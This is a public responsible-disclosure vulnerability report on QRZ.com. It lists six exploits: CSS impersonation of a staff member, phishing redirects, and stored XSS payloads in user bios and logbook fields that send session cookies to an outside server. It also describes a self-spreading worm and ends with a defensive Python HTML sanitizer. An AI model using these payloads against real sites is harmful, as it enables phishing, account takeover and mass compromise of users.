Exploit 1, staff impersonation
In this exploit, I abuse the custom CSS feature to make my user page look identical to that of a QRZ.com staff member. Using the CSS `visibility: hidden;` property and the `:after` pseudo-element, I replace my visible user type with "QRZ Engineering Manager". Then, using the `:before` and `:after` pseudo-elements, I load the staff and verified badges and place them next to my profile image.
```css
/* CUSTOM CSS */
#ppic {
  position: relative;
}
#ppic:before {
  position: absolute;
  left: -110px;
  content: url('https://s3.amazonaws.com/files.qrz.com/static/qrz/hq_staff_100x102.png');
}
#ppic:after {
  position: absolute;
  top: 116px;
  left: -116px;
  cursor: pointer;
  content: url('https://s3.amazonaws.com/files.qrz.com/static/ngassets/images/badges/idv_112x24.png');
}
.csignm {
  font-size: 32pt !important;
  font-style: italic !important;
  color: #f00 !important;
}
.green {
  visibility: hidden;
  position: relative;
}
.green:after {
  content: "QRZ Engineering Manager";
  color: #090;
  visibility: visible;
  margin-left: -80px;
}
```
Exploit 2, redirect to phishing, via user interaction
In this exploit, I abuse the `visibility: hidden;` property once again, this time hiding all user-related info and navigation items and displaying only the contents of the bio. Then I can place a phishing redirect link in my bio for the user to follow.
```css
/* CUSTOM CSS */
#calldata {
  display: none;
}
.ui-tabs-nav {
  display: none;
}
.f7 {
  display: none;
}
```
```html
<!-- BIO HTML -->
<h2 style="text-align: center">Your QRZ account has been deactivated.</h2>
<p style="text-align: center;">Click <a href="http://drakeluce.com/vulnerable">here</a> to view your account status.</p>
```
Exploit 3, redirect to phishing, automatic
In this exploit, I simply add an HTML meta refresh to the contents of my bio, and automatically redirect the user to a phishing page.
```html
<!-- BIO HTML -->
<meta http-equiv="refresh" content="0;url=https://drakeluce.com/vulnerable" />
```
Exploit 4, arbitrary JS execution, via user interaction
In this exploit, we go one step further. We can abuse the `formaction` attribute of a button, pointed at a `javascript:` URL, to execute arbitrary JavaScript. From this, we redirect the user to a malicious site along with their current cookies. We can then steal their session cookie and gain access to the user's account.
```html
<!-- BIO HTML -->
<form><button formaction="javascript:window.location.replace('https://drakeluce.com/vulnerable/?cookie=' + encodeURIComponent(document.cookie))">Click here for free HAM stuff!</button></form>
```
Exploit 5, arbitrary JS execution, automatic
This is the most pressing of all vulnerabilities.
We can abuse the `srcdoc` attribute of an iframe to automatically execute malicious JavaScript, accomplishing the same as Exploit 4 without user interaction.
Rather than redirecting the user to a page, we can simply make a request to a malicious server with the contents of `document.cookie`, which will then log the session key. Once set up, you immediately gain full access to the account of any user who accesses your callsign page.
This access allows us to construct a JavaScript virus. We use the compromised session key to edit that user's bio, adding the same malicious code. As more users visit callsign pages, this propagates throughout the entire userbase until every active account on the website is compromised.
In addition, the `xf_session` cookie also allows you to log in to accounts that have explicitly logged out, because logging out only removes the client-side cookie. Sessions are not destroyed server-side, so they may be resumed.
```html
<!-- BIO HTML -->
<iframe style="display: none;" srcdoc="&lt;img src=x:x onerror=a=document.createElement('img');a.src='http://localhost:3000/'+encodeURIComponent(document.cookie);window.top.document.body.appendChild(a);&gt;" />

<!-- The above evaluates to: -->
<iframe style="display: none;" srcdoc="<img src=x:x onerror=a=document.createElement('img');a.src='http://localhost:3000/'+encodeURIComponent(document.cookie);window.top.document.body.appendChild(a);>" />
```
NEW: Exploit 6, arbitrary JS execution, automatic (logbook)
The following pages in the QRZ logbook allow basic `<script>` injection:
- List page XSS:
  - Receiver Info > Op
- Detail XSS:
  - QSO Info > Info: Received
  - QSO Info > Info: Sent
  - Receiver Info > QTH
  - QSL Info > QSL to VE9DLL Via
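As an added defensive example (not part of the original report or of QRZ's code), a minimal allowlist sanitizer for user-supplied bio HTML using only Python's standard library: every tag and attribute not explicitly allowed is dropped, so the `srcdoc`, `formaction`, `http-equiv` and `<script>` vectors from Exploits 3 to 6 never reach the output, and `href` values with a non-http(s) scheme such as `javascript:` are removed. The tag allowlist and the `example.invalid` URLs in the comments are assumptions chosen for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist (an assumption for this example): tag -> attributes that may survive.
# Anything else is dropped, so srcdoc, formaction, http-equiv and on* handlers never pass.
ALLOWED = {t: set() for t in ("p", "h2", "br", "b", "i", "em", "strong", "ul", "ol", "li")}
ALLOWED["a"] = {"href"}
# Elements whose text content is code, not prose: the text goes with the tag.
DROP_WITH_CONTENT = {"script", "style"}

def clean_url(url):
    """Return the URL if its scheme is http(s), else None (rejects javascript: etc.)."""
    cleaned = "".join(c for c in url if c not in "\t\n\r").strip()  # browsers ignore these
    return cleaned if urlparse(cleaned).scheme.lower() in ("http", "https") else None

class BioSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)  # entities arrive decoded; re-escaped on output
        self.out, self.skip = [], 0
    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
            return
        if tag not in ALLOWED:  # iframe, meta, form, button, img...: tag dropped, text kept
            return
        kept = []
        for name, value in attrs:
            if name == "href" and value is not None:
                value = clean_url(value)
            if name in ALLOWED[tag] and value is not None:
                kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED and tag != "br":
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))  # text is always re-escaped, never passed raw

def sanitize_bio(html):
    """Sanitize one bio; e.g. '<iframe srcdoc=...></iframe><p>73!</p>' -> '<p>73!</p>'."""
    p = BioSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out)
```

Sanitizing on save is the first line of defence here; a Content-Security-Policy that forbids inline scripts and `HttpOnly` on `xf_session` would limit the damage if a payload still got through.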
Notes
Disclaimers
- All vulnerabilities were disclosed using the responsible disclosure model.
- To ensure I didn't capture any session keys other than my own during testing, all connections that gave me access to user data were made over `localhost`. Additionally, connections to https://drakeluce.com/vulnerable simply displayed data back to the end user and were not logged.
UPDATE (June 7th, 2018)
As of today, it appears all of the disclosed JavaScript vulnerabilities have been patched by the team at QRZ. This vulnerability report is now public.